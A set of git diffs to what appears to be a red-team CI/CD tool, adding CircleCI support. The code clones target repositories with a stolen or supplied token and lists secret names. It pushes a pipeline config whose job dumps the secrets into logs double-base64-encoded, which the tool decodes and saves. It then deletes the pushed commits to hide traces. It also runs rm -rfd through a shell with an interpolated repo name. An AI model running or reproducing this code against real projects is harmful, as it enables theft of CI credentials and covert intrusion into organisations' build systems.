         gitLabRunner.sleepTime = args["--sleep"]
     if args["--project-path"]:
         gitLabRunner.localPath = args["--project-path"]
+
+    # CircleCI mode — build a CircleCIRunner backed by the GitLab API client
+    if args["--circleci"]:
+        if not args["--circleci-token"]:
+            logger.critical("--circleci-token is required when --circleci is used.")
+
+        from nordstream.cicd.circleci import CircleCI
+        from nordstream.core.circleci.circleci import CircleCIRunner
+
+        if not CircleCI.checkToken(args["--circleci-token"]):
+            logger.critical("Invalid CircleCI token.")
+
+        circleCIClient = CircleCI(args["--circleci-token"])
+        _circleCIVcs = args["--circleci-vcs"] or "gl"
+        _circleCIOrg = args["--circleci-org"]  # caller must supply for gitlab
+        _circleCIProject = args["--circleci-project"]
+        # TODO: implement full GitLab-backed CircleCIRunner (vcsType="gl")
+        # For now we raise a clear not-implemented message so the user knows
+        # the feature is planned but not yet wired to GitLab-specific git ops.
+        logger.critical(
+            "CircleCI extraction via GitLab is not yet implemented. "
+            "Please use the 'github' subcommand for CircleCI extraction on GitHub-hosted repositories."
+        )
+        return  # unreachable — logger.critical() calls exit(1)
 
     # logic
     if args["--describe-token"]:

--- a/nordstream/commands/gitlab.py
+++ b/nordstream/commands/gitlab.py
@@ -132,15 +132,10 @@ def start(argv):
             logger.critical("--circleci-token is required when --circleci is used.")
 
         from nordstream.cicd.circleci import CircleCI
-        from nordstream.core.circleci.circleci import CircleCIRunner
 
         if not CircleCI.checkToken(args["--circleci-token"]):
             logger.critical("Invalid CircleCI token.")
 
-        circleCIClient = CircleCI(args["--circleci-token"])
-        _circleCIVcs = args["--circleci-vcs"] or "gl"
-        _circleCIOrg = args["--circleci-org"]  # caller must supply for gitlab
-        _circleCIProject = args["--circleci-project"]
         # TODO: implement full GitLab-backed CircleCIRunner (vcsType="gl")
         # For now we raise a clear not-implemented message so the user knows
         # the feature is planned but not yet wired to GitLab-specific git ops.
@@ -148,7 +143,6 @@ def start(argv):
             "CircleCI extraction via GitLab is not yet implemented. "
             "Please use the 'github' subcommand for CircleCI extraction on GitHub-hosted repositories."
         )
-        return  # unreachable — logger.critical() calls exit(1)
 
     # logic
     if args["--describe-token"]:

--- a/nordstream/core/circleci/circleci.py
+++ b/nordstream/core/circleci/circleci.py
@@ -1,10 +1,7 @@
-import base64
 import glob as globmod
-import json
 import logging
-import os
 import subprocess
-from os import makedirs
+from os import makedirs, chdir
 from os.path import basename, realpath
 
 from nordstream.cicd.circleci import CircleCI, CircleCIError
@@ -13,6 +10,11 @@ from nordstream.yaml.custom import CustomGenerator
 from nordstream.utils.log import logger, NordStreamLog
 from nordstream.utils.constants import DEFAULT_CIRCLECI_CONFIG_FILENAME, OUTPUT_DIR
 from nordstream.git import Git
+from nordstream.core.circleci.utils import (
+    displayProjectEnvVars,
+    displayContexts,
+    extractAndSaveSecrets,
+)
 
 
 class CircleCIRunner:
@@ -127,10 +129,8 @@ class CircleCIRunner:
         Results are cached per repo so the API is only called once per run.
         Returns the dict from findProjectByRepo(), or None if not found.
         """
-        # If everything is explicitly set, no resolution needed
-        if (self._circleOrg is not None
-                and self._circleProject is not None
-                and self._vcsType is not None):
+        # If every identifier is explicitly set, no API resolution needed
+        if None not in (self._circleOrg, self._circleProject, self._vcsType):
             return None
 
         if repo not in self._resolvedProjects:
@@ -229,41 +229,14 @@ class CircleCIRunner:
                 self.__displayContexts(repo)
 
     def __displayProjectEnvVars(self, projectSlug):
-        try:
-            vars_ = self._circleCicd.listProjectEnvVars(projectSlug)
-            if vars_:
-                logger.info("Project environment variables:")
-                for v in vars_:
-                    logger.raw(f"\t- {v}\n", logging.INFO)
-            else:
-                logger.info("No project environment variables found.")
-        except CircleCIError as e:
-            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
-                logger.error(f"Can't list project env vars: {e}")
+        displayProjectEnvVars(self._circleCicd, projectSlug)
 
     def __displayContexts(self, repo):
-        orgIdentifier = self.__circleOrgForRepo(repo)
-        try:
-            orgId = self._circleCicd.getOrgId(self.__effectiveVcsType(repo), orgIdentifier)
-            if not orgId:
-                logger.verbose(f"Could not resolve org ID for {orgIdentifier}")
-                return
-            contexts = self._circleCicd.listContexts(orgId)
-            if contexts:
-                logger.info("Org contexts:")
-                for ctx in contexts:
-                    logger.raw(f"\t- {ctx['name']}\n", logging.INFO)
-                    try:
-                        envVars = self._circleCicd.listContextEnvVars(ctx["id"])
-                        for v in envVars:
-                            logger.raw(f"\t    - {v}\n", logging.INFO)
-                    except CircleCIError:
-                        pass
-            else:
-                logger.info("No org contexts found.")
-        except CircleCIError as e:
-            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
-                logger.error(f"Can't list contexts: {e}")
+        displayContexts(
+            self._circleCicd,
+            self.__effectiveVcsType(repo),
+            self.__circleOrgForRepo(repo),
+        )
 
     # ------------------------------------------------------------------
     # Pipeline extraction
@@ -277,12 +250,15 @@ class CircleCIRunner:
         for repo in self._gitCicd.repos:
             logger.success(f'"{repo}" (CircleCI)')
 
-            # Clone using the VCS token embedded in the URL
-            url = f"https://foo:{self._gitCicd.token}@github.com/{repo}"
+            # Clone using the VCS token embedded in the URL.
+            # gitBaseUrl is set on the adapter when the caller knows the VCS host;
+            # it defaults to github.com for backwards compatibility.
+            gitBase = getattr(self._gitCicd, 'gitBaseUrl', 'github.com')
+            url = f"https://foo:{self._gitCicd.token}@{gitBase}/{repo}"
             Git.gitClone(url)
 
             repoShortName = repo.split("/")[1]
-            os.chdir(repoShortName)
+            chdir(repoShortName)
 
             self._pushedCommitsCount = 0
             self._branchAlreadyExists = Git.gitRemoteBranchExists(self._gitCicd.branchName)
@@ -302,7 +278,7 @@ class CircleCIRunner:
 
             finally:
                 self.__clean(repo)
-                os.chdir("../")
+                chdir("../")
                 subprocess.Popen(f"rm -rfd ./{repoShortName}", shell=True).wait()
 
         logger.info(f"Check output: {self._circleCicd.outputDir}")
@@ -389,8 +365,8 @@ class CircleCIRunner:
 
     def __generateAndLaunchPipeline(self, repo, generator, outputName):
         try:
-            pipelineId, workflowId, jobNumber = self.__launchPipeline(repo, generator)
-            return self.__postProcessingPipeline(repo, pipelineId, workflowId, jobNumber, outputName)
+            pipelineId, workflowId, workflowStatus, jobNumber = self.__launchPipeline(repo, generator)
+            return self.__postProcessingPipeline(repo, workflowId, workflowStatus, jobNumber, outputName)
         except Exception as e:
             logger.error(f"Error: {e}")
             if logger.getEffectiveLevel() == logging.DEBUG:
@@ -417,19 +393,20 @@ class CircleCIRunner:
         generator.writeFile(configPath)
 
         pushOutput = Git.gitPush(self._gitCicd.branchName)
+        _, stderr = pushOutput.communicate()
         pushOutput.wait()
 
-        if b"Everything up-to-date" in pushOutput.communicate()[1].strip():
+        if b"Everything up-to-date" in stderr.strip():
             logger.error("Error when pushing code: Everything up-to-date")
             raise Exception("Git push: everything up-to-date, nothing to push.")
 
         if pushOutput.returncode != 0:
             logger.error("Error when pushing code:")
-            logger.raw(pushOutput.communicate()[1], logging.INFO)
+            logger.raw(stderr, logging.INFO)
             raise Exception("Git push failed.")
 
         self._pushedCommitsCount += 1
-        logger.raw(pushOutput.communicate()[1])
+        logger.raw(stderr)
 
         projectSlug = self.__projectSlug(repo)
 
@@ -465,15 +442,11 @@ class CircleCIRunner:
         if jobNumber is None and jobs:
             jobNumber = jobs[0].get("job_number")
 
-        return pipelineId, workflowId, jobNumber
+        return pipelineId, workflowId, status, jobNumber
 
-    def __postProcessingPipeline(self, repo, pipelineId, workflowId, jobNumber, outputName):
+    def __postProcessingPipeline(self, repo, workflowId, status, jobNumber, outputName):
         if workflowId is None:
             return False
-
-        # Determine workflow status from the already-waited pipeline
-        workflows = self._circleCicd.getPipelineWorkflows(pipelineId)
-        status = workflows[0].get("status") if workflows else None
 
         if status == "success":
             logger.success("Pipeline completed successfully.")
@@ -502,58 +475,7 @@ class CircleCIRunner:
 
     def __extractSensitiveInformationFromPipelineResult(self, repo, informationType="Secrets"):
         outputDir = self.__repoOutputDir(repo)
-        files = globmod.glob(f"{outputDir}/circleci_secrets_*.log")
-        if not files:
-            logger.error("No output file found.")
-            return
-
-        filePath = sorted(files)[-1]
-        with open(filePath, "r") as f:
-            lines = f.readlines()
-
-        # The exfil command double-base64-encodes all output onto a single line.
-        # CircleCI wraps each step output line as a JSON array of message objects;
-        # the actual content is in the `message` field of each entry.
-        # We scan lines in reverse for the last non-empty base64 blob.
-        raw_b64 = None
-        for line in reversed(lines):
-            line = line.strip()
-            if not line:
-                continue
-            # CircleCI step output format: [{"message": "...", "type": "out", ...}]
-            if line.startswith("["):
-                try:
-                    entries = json.loads(line)
-                    for entry in reversed(entries):
-                        msg = entry.get("message", "").strip()
-                        if msg:
-                            raw_b64 = msg
-                            break
-                    if raw_b64:
-                        break
-                except (json.JSONDecodeError, AttributeError):
-                    pass
-            else:
-                # Fallback: plain-text output (some runner configs)
-                raw_b64 = line
-                break
-
-        if not raw_b64:
-            logger.error("Could not find encoded output in pipeline logs.")
-            return
-
-        try:
-            secrets = base64.b64decode(base64.b64decode(raw_b64))
-        except Exception as e:
-            logger.error(f"Failed to decode pipeline output: {e}")
-            return
-
-        logger.success(f"{informationType}:")
-        logger.raw(secrets, logging.INFO)
-
-        outFile = f"{outputDir}/{informationType.lower().replace(' ', '_')}.txt"
-        with open(outFile, "ab") as f:
-            f.write(secrets)
+        extractAndSaveSecrets(outputDir, "circleci_secrets_*.log", informationType)
 
     # ------------------------------------------------------------------
     # Cleanup

--- a/nordstream/core/circleci/circleci.py
+++ b/nordstream/core/circleci/circleci.py
@@ -1,0 +1,524 @@
+import base64
+import glob as globmod
+import json
+import logging
+import os
+import subprocess
+from os import makedirs
+from os.path import basename, realpath
+
+from nordstream.cicd.circleci import CircleCI, CircleCIError
+from nordstream.yaml.circleci import CircleCIPipelineGenerator
+from nordstream.yaml.custom import CustomGenerator
+from nordstream.utils.log import logger, NordStreamLog
+from nordstream.utils.constants import DEFAULT_CIRCLECI_CONFIG_FILENAME, OUTPUT_DIR
+from nordstream.git import Git
+
+
+class CircleCIRunner:
+    """
+    Shared orchestration layer for CircleCI secret extraction.
+
+    Instantiated by GitHubWorkflowRunner (and in the future by GitLabRunner).
+
+    Parameters
+    ----------
+    gitCicd      : GitHub / GitLab API client — used for git clone URL and
+                   branch name, NOT for CircleCI API calls.
+    circleCicd   : CircleCI API client.
+    vcsType      : CircleCI VCS slug prefix.
+                   Classic GitHub OAuth → "gh"
+                   Classic GitLab OAuth → "gl"
+                   GitHub App / GitLab App → "circleci"
+    circleOrg    : Override for the org part of the CircleCI project slug.
+                   When None the Git org (repo.split("/")[0]) is used.
+                   For GitHub/GitLab App integrations this must be the org UUID.
+    circleProject: Override for the project part of the CircleCI project slug.
+                   When None the repo short name (repo.split("/")[1]) is used.
+                   For GitHub/GitLab App integrations this must be the project UUID.
+                   Only meaningful when targeting a single repo; if multiple repos
+                   are given and this is set, the same project override is applied
+                   to all of them (use --repo to scope to a single target).
+    """
+
+    _gitCicd = None
+    _circleCicd = None
+    _vcsType = "gh"
+    _circleOrg = None      # None → derive from git org
+    _circleProject = None  # None → derive from repo short name
+
+    _yaml = None
+    _extractProject = True
+    _extractOrg = True
+    _cleanLogs = True
+    _pushedCommitsCount = 0
+    _branchAlreadyExists = False
+    _configFilename = DEFAULT_CIRCLECI_CONFIG_FILENAME
+
+    def __init__(self, gitCicd, circleCicd, vcsType="gh", circleOrg=None, circleProject=None):
+        self._gitCicd = gitCicd
+        self._circleCicd = circleCicd
+        self._vcsType = vcsType
+        self._circleOrg = circleOrg
+        self._circleProject = circleProject
+        self.__createLogDir()
+
+    # ------------------------------------------------------------------
+    # Properties
+    # ------------------------------------------------------------------
+
+    @property
+    def extractProject(self):
+        return self._extractProject
+
+    @extractProject.setter
+    def extractProject(self, value):
+        self._extractProject = value
+
+    @property
+    def extractOrg(self):
+        return self._extractOrg
+
+    @extractOrg.setter
+    def extractOrg(self, value):
+        self._extractOrg = value
+
+    @property
+    def cleanLogs(self):
+        return self._cleanLogs
+
+    @cleanLogs.setter
+    def cleanLogs(self, value):
+        self._cleanLogs = value
+
+    @property
+    def yaml(self):
+        return self._yaml
+
+    @yaml.setter
+    def yaml(self, value):
+        self._yaml = realpath(value)
+
+    # ------------------------------------------------------------------
+    # Internal helpers
+    # ------------------------------------------------------------------
+
+    def __createLogDir(self):
+        self._circleCicd.outputDir = realpath(OUTPUT_DIR) + "/circleci"
+        makedirs(self._circleCicd.outputDir, exist_ok=True)
+
+    @staticmethod
+    def __createCircleCIDir():
+        makedirs(".circleci", exist_ok=True)
+
+    def __projectSlug(self, repo):
+        """
+        Build the CircleCI project slug for this repo.
+
+        Priority:
+          1. Fully explicit: --circleci-vcs + --circleci-org + --circleci-project
+             → "<vcsType>/<circleOrg>/<circleProject>"
+          2. Org override only (--circleci-org set, --circleci-project not set):
+             → "<vcsType>/<circleOrg>/<repoShortName>"
+          3. Neither override set (default):
+             → "<vcsType>/<gitOrg>/<repoShortName>"
+
+        For classic GitHub/GitLab integrations (vcsType "gh"/"gl") the org and
+        project names match the git repo names.
+        For GitHub App / GitLab App integrations (vcsType "circleci") both must
+        be UUIDs supplied via --circleci-org and --circleci-project.
+        """
+        git_org, repo_short = repo.split("/", 1)
+        org = self._circleOrg if self._circleOrg is not None else git_org
+        project = self._circleProject if self._circleProject is not None else repo_short
+        slug = f"{self._vcsType}/{org}/{project}"
+        logger.verbose(f"CircleCI project slug: {slug}")
+        return slug
+
+    def __circleOrgForRepo(self, repo):
+        """
+        Return the CircleCI org identifier used for context listing.
+        If --circleci-org was supplied, use that (it may be a UUID or slug).
+        Otherwise derive from the git org portion of the repo full name.
+        """
+        if self._circleOrg is not None:
+            return self._circleOrg
+        return repo.split("/")[0]
+
+    def __repoOutputDir(self, repo):
+        """Return the per-repo output sub-directory path."""
+        repoPath = repo.replace("/", "_")
+        path = f"{self._circleCicd.outputDir}/{repoPath}"
+        makedirs(path, exist_ok=True)
+        return path
+
+    # ------------------------------------------------------------------
+    # Secret listing (read-only, names only via API)
+    # ------------------------------------------------------------------
+
+    def listCircleCISecrets(self):
+        """
+        List CircleCI secret names (no values) for all repos via the API.
+        Mirrors GitHubWorkflowRunner.listGitHubSecrets().
+        """
+        logger.info("Listing CircleCI secrets (names only):")
+        for repo in self._gitCicd.repos:
+            logger.info(f'"{repo}" CircleCI secrets')
+            projectSlug = self.__projectSlug(repo)
+
+            if self._extractProject:
+                self.__displayProjectEnvVars(projectSlug)
+
+            if self._extractOrg:
+                self.__displayContexts(repo)
+
+    def __displayProjectEnvVars(self, projectSlug):
+        try:
+            vars_ = self._circleCicd.listProjectEnvVars(projectSlug)
+            if vars_:
+                logger.info("Project environment variables:")
+                for v in vars_:
+                    logger.raw(f"\t- {v}\n", logging.INFO)
+            else:
+                logger.info("No project environment variables found.")
+        except CircleCIError as e:
+            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
+                logger.error(f"Can't list project env vars: {e}")
+
+    def __displayContexts(self, repo):
+        orgIdentifier = self.__circleOrgForRepo(repo)
+        try:
+            orgId = self._circleCicd.getOrgId(self._vcsType, orgIdentifier)
+            if not orgId:
+                logger.verbose(f"Could not resolve org ID for {orgIdentifier}")
+                return
+            contexts = self._circleCicd.listContexts(orgId)
+            if contexts:
+                logger.info("Org contexts:")
+                for ctx in contexts:
+                    logger.raw(f"\t- {ctx['name']}\n", logging.INFO)
+                    try:
+                        envVars = self._circleCicd.listContextEnvVars(ctx["id"])
+                        for v in envVars:
+                            logger.raw(f"\t    - {v}\n", logging.INFO)
+                    except CircleCIError:
+                        pass
+            else:
+                logger.info("No org contexts found.")
+        except CircleCIError as e:
+            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
+                logger.error(f"Can't list contexts: {e}")
+
+    # ------------------------------------------------------------------
+    # Pipeline extraction
+    # ------------------------------------------------------------------
+
+    def start(self):
+        """
+        Main extraction loop — mirrors GitHubWorkflowRunner.start() but
+        injects a CircleCI config instead of a GitHub Actions workflow.
+        """
+        for repo in self._gitCicd.repos:
+            logger.success(f'"{repo}" (CircleCI)')
+
+            # Clone using the VCS token embedded in the URL
+            url = f"https://foo:{self._gitCicd.token}@github.com/{repo}"
+            Git.gitClone(url)
+
+            repoShortName = repo.split("/")[1]
+            os.chdir(repoShortName)
+
+            self._pushedCommitsCount = 0
+            self._branchAlreadyExists = Git.gitRemoteBranchExists(self._gitCicd.branchName)
+            Git.gitInitialization(self._gitCicd.branchName, branchAlreadyExists=self._branchAlreadyExists)
+
+            try:
+                self.__createCircleCIDir()
+                self.__dispatchPipeline(repo)
+
+            except KeyboardInterrupt:
+                pass
+
+            except Exception as e:
+                logger.error(f"Error: {e}")
+                if logger.getEffectiveLevel() == logging.DEBUG:
+                    logger.exception(e)
+
+            finally:
+                self.__clean(repo)
+                os.chdir("../")
+                subprocess.Popen(f"rm -rfd ./{repoShortName}", shell=True).wait()
+
+        logger.info(f"Check output: {self._circleCicd.outputDir}")
+
+    def __dispatchPipeline(self, repo):
+        if self._yaml:
+            self.__runCustomPipeline(repo)
+        else:
+            self.__runSecretsExtractionPipeline(repo)
+
+    # ------------------------------------------------------------------
+    # Custom YAML
+    # ------------------------------------------------------------------
+
+    def __runCustomPipeline(self, repo):
+        logger.info(f"Running custom CircleCI pipeline: {self._yaml}")
+
+        generator = CustomGenerator()
+        generator.loadFile(self._yaml)
+        self._configFilename = basename(self._yaml)
+
+        if self.__generateAndLaunchPipeline(repo, generator, "custom"):
+            self.__displayCustomPipelineOutput(repo)
+
+        logger.empty_line()
+
+    def __displayCustomPipelineOutput(self, repo):
+        outputDir = self.__repoOutputDir(repo)
+        files = globmod.glob(f"{outputDir}/circleci_custom_*.log")
+        if files:
+            with open(sorted(files)[-1], "r") as f:
+                logger.success("Pipeline output:")
+                for line in f:
+                    logger.raw(line, logging.INFO)
+
+    # ------------------------------------------------------------------
+    # Secrets extraction
+    # ------------------------------------------------------------------
+
+    def __runSecretsExtractionPipeline(self, repo):
+        projectSlug = self.__projectSlug(repo)
+
+        projectVars = []
+        contextNames = []
+
+        try:
+            if self._extractProject:
+                projectVars = self._circleCicd.listProjectEnvVars(projectSlug)
+        except CircleCIError as e:
+            logger.error(f"Can't list project env vars: {e}")
+
+        try:
+            if self._extractOrg:
+                orgIdentifier = self.__circleOrgForRepo(repo)
+                orgId = self._circleCicd.getOrgId(self._vcsType, orgIdentifier)
+                if orgId:
+                    contexts = self._circleCicd.listContexts(orgId)
+                    contextNames = [c["name"] for c in contexts]
+        except CircleCIError as e:
+            logger.error(f"Can't list contexts: {e}")
+
+        if not projectVars and not contextNames:
+            logger.info(f'No CircleCI secrets found for "{repo}"')
+            logger.empty_line()
+            return
+
+        logger.info(f'Found CircleCI secrets for "{repo}":')
+        if projectVars:
+            logger.info(f"  Project env vars ({len(projectVars)}): {', '.join(projectVars)}")
+        if contextNames:
+            logger.info(f"  Contexts ({len(contextNames)}): {', '.join(contextNames)}")
+
+        generator = CircleCIPipelineGenerator()
+        generator.generatePipelineForSecretsExtraction(projectVars, contextNames)
+
+        if self.__generateAndLaunchPipeline(repo, generator, "secrets"):
+            self.__extractSensitiveInformationFromPipelineResult(repo)
+
+        logger.empty_line()
+
+    # ------------------------------------------------------------------
+    # Pipeline lifecycle
+    # ------------------------------------------------------------------
+
+    def __generateAndLaunchPipeline(self, repo, generator, outputName):
+        try:
+            pipelineId, workflowId, jobNumber = self.__launchPipeline(repo, generator)
+            return self.__postProcessingPipeline(repo, pipelineId, workflowId, jobNumber, outputName)
+        except Exception as e:
+            logger.error(f"Error: {e}")
+            if logger.getEffectiveLevel() == logging.DEBUG:
+                logger.exception(e)
+            return False
+
+    def __launchPipeline(self, repo, generator):
+        """
+        Write config.yml → git push → obtain pipeline ID → wait.
+
+        For classic OAuth integrations (vcsType "gh"/"gl") the pipeline must be
+        explicitly triggered via the CircleCI API after the push.
+
+        For GitHub App / GitLab App integrations (vcsType "circleci") the git push
+        already triggers CircleCI automatically.  We must NOT call the trigger API
+        (it returns 400/unsupported) — instead we poll the project's pipeline list
+        until we see the newly created pipeline for our branch.
+
+        Returns (pipelineId, workflowId, jobNumber).
+        """
+        logger.verbose("Launching CircleCI pipeline.")
+
+        configPath = f".circleci/{self._configFilename}"
+        generator.writeFile(configPath)
+
+        pushOutput = Git.gitPush(self._gitCicd.branchName)
+        pushOutput.wait()
+
+        if b"Everything up-to-date" in pushOutput.communicate()[1].strip():
+            logger.error("Error when pushing code: Everything up-to-date")
+            raise Exception("Git push: everything up-to-date, nothing to push.")
+
+        if pushOutput.returncode != 0:
+            logger.error("Error when pushing code:")
+            logger.raw(pushOutput.communicate()[1], logging.INFO)
+            raise Exception("Git push failed.")
+
+        self._pushedCommitsCount += 1
+        logger.raw(pushOutput.communicate()[1])
+
+        projectSlug = self.__projectSlug(repo)
+
+        if self._vcsType == "circleci":
+            # GitHub App / GitLab App: push already triggered the pipeline.
+            # Poll the project's pipeline list to find the one for our branch.
+            logger.verbose("GitHub App integration — waiting for auto-triggered pipeline.")
+            pipelineId = self._circleCicd.waitForPipelineOnBranch(
+                projectSlug, self._gitCicd.branchName
+            )
+        else:
+            # Classic OAuth: explicitly trigger via the API.
+            pipelineId = self._circleCicd.triggerPipeline(projectSlug, self._gitCicd.branchName)
+
+        if not pipelineId:
+            raise Exception("Failed to find or trigger CircleCI pipeline.")
+
+        logger.verbose(f"Pipeline ID: {pipelineId}")
+
+        workflowId, status = self._circleCicd.waitPipeline(pipelineId)
+
+        if not workflowId:
+            raise Exception("Pipeline timed out or no workflow found.")
+
+        # Resolve the job number from the workflow
+        jobs = self._circleCicd.getWorkflowJobs(workflowId)
+        jobNumber = None
+        for job in jobs:
+            if job.get("name") == "init":
+                jobNumber = job.get("job_number")
+                break
+
+        if jobNumber is None and jobs:
+            jobNumber = jobs[0].get("job_number")
+
+        return pipelineId, workflowId, jobNumber
+
+    def __postProcessingPipeline(self, repo, pipelineId, workflowId, jobNumber, outputName):
+        if workflowId is None:
+            return False
+
+        # Determine workflow status from the already-waited pipeline
+        workflows = self._circleCicd.getPipelineWorkflows(pipelineId)
+        status = workflows[0].get("status") if workflows else None
+
+        if status == "success":
+            logger.success("Pipeline completed successfully.")
+        elif status in ("failed", "error"):
+            logger.error(f"Pipeline {status}.")
+            return False
+        else:
+            logger.warning(f"Unexpected pipeline status: {status}")
+            return False
+
+        if jobNumber is None:
+            logger.error("Could not determine job number — cannot download output.")
+            return False
+
+        projectSlug = self.__projectSlug(repo)
+        outputDir = self.__repoOutputDir(repo)
+        filePath = self._circleCicd.downloadJobOutput(
+            projectSlug, jobNumber, outputDir,
+            outputName.replace("/", "_").replace(" ", "_"),
+        )
+        return filePath is not None
+
+    # ------------------------------------------------------------------
+    # Output extraction
+    # ------------------------------------------------------------------
+
+    def __extractSensitiveInformationFromPipelineResult(self, repo, informationType="Secrets"):
+        outputDir = self.__repoOutputDir(repo)
+        files = globmod.glob(f"{outputDir}/circleci_secrets_*.log")
+        if not files:
+            logger.error("No output file found.")
+            return
+
+        filePath = sorted(files)[-1]
+        with open(filePath, "r") as f:
+            lines = f.readlines()
+
+        # The exfil command double-base64-encodes all output onto a single line.
+        # CircleCI wraps each step output line as a JSON array of message objects;
+        # the actual content is in the `message` field of each entry.
+        # We scan lines in reverse for the last non-empty base64 blob.
+        raw_b64 = None
+        for line in reversed(lines):
+            line = line.strip()
+            if not line:
+                continue
+            # CircleCI step output format: [{"message": "...", "type": "out", ...}]
+            if line.startswith("["):
+                try:
+                    entries = json.loads(line)
+                    for entry in reversed(entries):
+                        msg = entry.get("message", "").strip()
+                        if msg:
+                            raw_b64 = msg
+                            break
+                    if raw_b64:
+                        break
+                except (json.JSONDecodeError, AttributeError):
+                    pass
+            else:
+                # Fallback: plain-text output (some runner configs)
+                raw_b64 = line
+                break
+
+        if not raw_b64:
+            logger.error("Could not find encoded output in pipeline logs.")
+            return
+
+        try:
+            secrets = base64.b64decode(base64.b64decode(raw_b64))
+        except Exception as e:
+            logger.error(f"Failed to decode pipeline output: {e}")
+            return
+
+        logger.success(f"{informationType}:")
+        logger.raw(secrets, logging.INFO)
+
+        outFile = f"{outputDir}/{informationType.lower().replace(' ', '_')}.txt"
+        with open(outFile, "ab") as f:
+            f.write(secrets)
+
+    # ------------------------------------------------------------------
+    # Cleanup
+    # ------------------------------------------------------------------
+
+    def __clean(self, repo):
+        if self._pushedCommitsCount == 0:
+            return
+
+        if self._cleanLogs:
+            logger.info("Cleaning CircleCI pipeline logs.")
+            # CircleCI v2 API has no public delete-pipeline endpoint;
+            # run logs age out naturally.  We clean the git artefacts only.
+            logger.verbose("Note: CircleCI run logs must be deleted manually via the UI.")
+
+        logger.verbose("Cleaning commits.")
+        if self._branchAlreadyExists and self._gitCicd.branchName != self._gitCicd.defaultBranchName:
+            Git.gitUndoLastPushedCommits(self._gitCicd.branchName, self._pushedCommitsCount)
+        else:
+            deleteOutput = Git.gitDeleteRemote(self._gitCicd.branchName)
+            deleteOutput.wait()
+            if deleteOutput.returncode != 0:
+                logger.error(f"Error deleting remote branch {self._gitCicd.branchName}")
+                Git.gitCleanRemote(self._gitCicd.branchName, leaveOneFile=True)

--- a/nordstream/core/circleci/circleci.py
+++ b/nordstream/core/circleci/circleci.py
@@ -44,8 +44,8 @@ class CircleCIRunner:
     _gitCicd = None
     _circleCicd = None
     _vcsType = "gh"
-    _circleOrg = None      # None → derive from git org
-    _circleProject = None  # None → derive from repo short name
+    _circleOrg = None      # None → derive from git org (or auto-resolve)
+    _circleProject = None  # None → derive from repo short name (or auto-resolve)
 
     _yaml = None
     _extractProject = True
@@ -55,12 +55,17 @@ class CircleCIRunner:
     _branchAlreadyExists = False
     _configFilename = DEFAULT_CIRCLECI_CONFIG_FILENAME
 
+    # Cache: "org/repo" → result dict from findProjectByRepo()
+    # Populated on first call, reused for subsequent repos in the same run.
+    _resolvedProjects = {}
+
     def __init__(self, gitCicd, circleCicd, vcsType="gh", circleOrg=None, circleProject=None):
         self._gitCicd = gitCicd
         self._circleCicd = circleCicd
         self._vcsType = vcsType
         self._circleOrg = circleOrg
         self._circleProject = circleProject
+        self._resolvedProjects = {}
         self.__createLogDir()
 
     # ------------------------------------------------------------------
@@ -111,36 +116,87 @@ class CircleCIRunner:
     def __createCircleCIDir():
         makedirs(".circleci", exist_ok=True)
 
+    def __resolveForRepo(self, repo):
+        """
+        Auto-discover the CircleCI project for a GitHub/GitLab repo by scanning
+        the CircleCI API (collaborations → pipeline history).
+
+        Triggered when at least one of _circleOrg / _circleProject / _vcsType
+        is not explicitly provided by the user (i.e. needs to be inferred).
+
+        Results are cached per repo so the API is only called once per run.
+        Returns the dict from findProjectByRepo(), or None if not found.
+        """
+        # If everything is explicitly set, no resolution needed
+        if (self._circleOrg is not None
+                and self._circleProject is not None
+                and self._vcsType is not None):
+            return None
+
+        if repo not in self._resolvedProjects:
+            logger.verbose(f"Auto-resolving CircleCI project for '{repo}'")
+            result = self._circleCicd.findProjectByRepo(repo)
+            self._resolvedProjects[repo] = result
+            if result:
+                logger.verbose(
+                    f"Resolved '{repo}' → {result['project_slug']} "
+                    f"(vcs_type={result['vcs_type']})"
+                )
+            else:
+                logger.warning(
+                    f"Could not find a CircleCI project linked to \"{repo}\". "
+                    f"Provide --circleci-vcs, --circleci-org and --circleci-project "
+                    f"to specify it manually."
+                )
+        return self._resolvedProjects[repo]
+
+    def __effectiveVcsType(self, repo):
+        """
+        Return the VCS type to use for this repo — from the resolved project if
+        auto-discovered, otherwise from the explicit _vcsType (defaulting to "gh").
+        """
+        resolved = self.__resolveForRepo(repo)
+        if resolved:
+            return resolved["vcs_type"]
+        return self._vcsType or "gh"
+
     def __projectSlug(self, repo):
         """
         Build the CircleCI project slug for this repo.
 
         Priority:
-          1. Fully explicit: --circleci-vcs + --circleci-org + --circleci-project
+          1. Auto-resolve via API when vcs/org/project not fully explicit
+             → full project_slug from findProjectByRepo()
+          2. All three explicitly set by user
              → "<vcsType>/<circleOrg>/<circleProject>"
-          2. Org override only (--circleci-org set, --circleci-project not set):
-             → "<vcsType>/<circleOrg>/<repoShortName>"
-          3. Neither override set (default):
-             → "<vcsType>/<gitOrg>/<repoShortName>"
-
-        For classic GitHub/GitLab integrations (vcsType "gh"/"gl") the org and
-        project names match the git repo names.
-        For GitHub App / GitLab App integrations (vcsType "circleci") both must
-        be UUIDs supplied via --circleci-org and --circleci-project.
+          3. Org override only (--circleci-org set, --circleci-project not set):
+             → "<effectiveVcsType>/<circleOrg>/<repoShortName>"
+          4. Nothing set (classic gh/gl where names match):
+             → "<effectiveVcsType>/<gitOrg>/<repoShortName>"
         """
+        resolved = self.__resolveForRepo(repo)
+        if resolved:
+            slug = resolved["project_slug"]
+            logger.verbose(f"CircleCI project slug (auto-resolved): {slug}")
+            return slug
+
         git_org, repo_short = repo.split("/", 1)
+        vcs = self.__effectiveVcsType(repo)
         org = self._circleOrg if self._circleOrg is not None else git_org
         project = self._circleProject if self._circleProject is not None else repo_short
-        slug = f"{self._vcsType}/{org}/{project}"
+        slug = f"{vcs}/{org}/{project}"
         logger.verbose(f"CircleCI project slug: {slug}")
         return slug
 
     def __circleOrgForRepo(self, repo):
         """
         Return the CircleCI org identifier used for context listing.
-        If --circleci-org was supplied, use that (it may be a UUID or slug).
-        Otherwise derive from the git org portion of the repo full name.
+        Uses the auto-resolved org UUID when available, otherwise falls back to
+        the explicit override or the git org name.
         """
+        resolved = self.__resolveForRepo(repo)
+        if resolved:
+            return resolved["circle_org"]
         if self._circleOrg is not None:
             return self._circleOrg
         return repo.split("/")[0]
@@ -188,7 +244,7 @@ class CircleCIRunner:
     def __displayContexts(self, repo):
         orgIdentifier = self.__circleOrgForRepo(repo)
         try:
